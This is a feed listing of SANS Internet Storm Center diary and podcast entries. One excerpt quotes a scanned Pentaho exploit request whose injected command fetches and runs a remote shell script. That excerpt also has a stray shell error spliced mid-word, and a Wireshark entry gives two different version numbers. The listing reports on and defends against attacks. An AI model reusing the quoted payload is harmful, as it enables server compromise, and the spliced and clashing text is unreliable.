-
ISC Stormcast For Wednesday, December 3rd, 2025 https://isc.sans.edu/podcastdetail/9722, (Wed, Dec 3rd)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
ISC Stormcast For Tuesday, December 2nd, 2025 https://isc.sans.edu/podcastdetail/9720, (Tue, Dec 2nd)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
![[Guest Diary] Hunting for SharePoint In-Memory ToolShell Payloads, (Tue, Dec 2nd)](/wp-content/uploads/2025/12/2025-12-02_figure1-UHamgO.png)
[Guest Diary] Hunting for SharePoint In-Memory ToolShell Payloads, (Tue, Dec 2nd)
[This is a Guest Diary by James Woodworth, an ISC intern as part of the SANS.edu Bachelor’s Degree in Applied Cybersecurity (BACS) program [1]. In July 2025, many of us were introduced to the Microsoft SharePoint exploit chain known as ToolShell. ToolShell exploits the deserialization and authentication bypass vulnerabilities, CVE-2025-53770 [2] and CVE-2025-53771 [3], in…
-
ISC Stormcast For Monday, December 1st, 2025 https://isc.sans.edu/podcastdetail/9718, (Mon, Dec 1st)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
ISC Stormcast For Wednesday, November 26th, 2025 https://isc.sans.edu/podcastdetail/9716, (Wed, Nov 26th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
ISC Stormcast For Tuesday, November 25th, 2025 https://isc.sans.edu/podcastdetail/9714, (Tue, Nov 25th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
Conflicts between URL mapping and URL based access control., (Mon, Nov 24th)
We continue to encounter high-profile vulnerabilities that relate to how URL mapping (or “aliases”) interac|zsh:1: parse error near `&’ ts with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today: /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23%7BT(java.lang.Runtime).getRuntime().exec(‘wget%20-qO-%20http%3A%2F%2F[redacted]%2Frondo.pms.sh%7Csh’)%7D&mgrDn=a&pwd=a This request attempts to exploit a vulnerability in Hitachi Vantara…
-
ISC Stormcast For Monday, November 24th, 2025 https://isc.sans.edu/podcastdetail/9712, (Mon, Nov 24th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
-
YARA-X 1.10.0 Release: Fix Warnings, (Sun, Nov 23rd)
YARA-X’s 1.10.0 release brings a new command: fix warnings. If you have a rule that would generate a warning with a help section (explaining how to fix it), like this example rule: rule FixableCountWarning { strings: $a1 = “malicious” $a2 = “badstuff” condition: 0 of ($a*) } Then YARA-X from version 1.10.0 on can…
-
Wireshark 4.4.1 Released, (Sun, Nov 23rd)
Wireshark release 4.6.1 fixes 2 vulnerabilities and 20 bugs. Didier Stevens Senior handler blog.DidierStevens.com (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
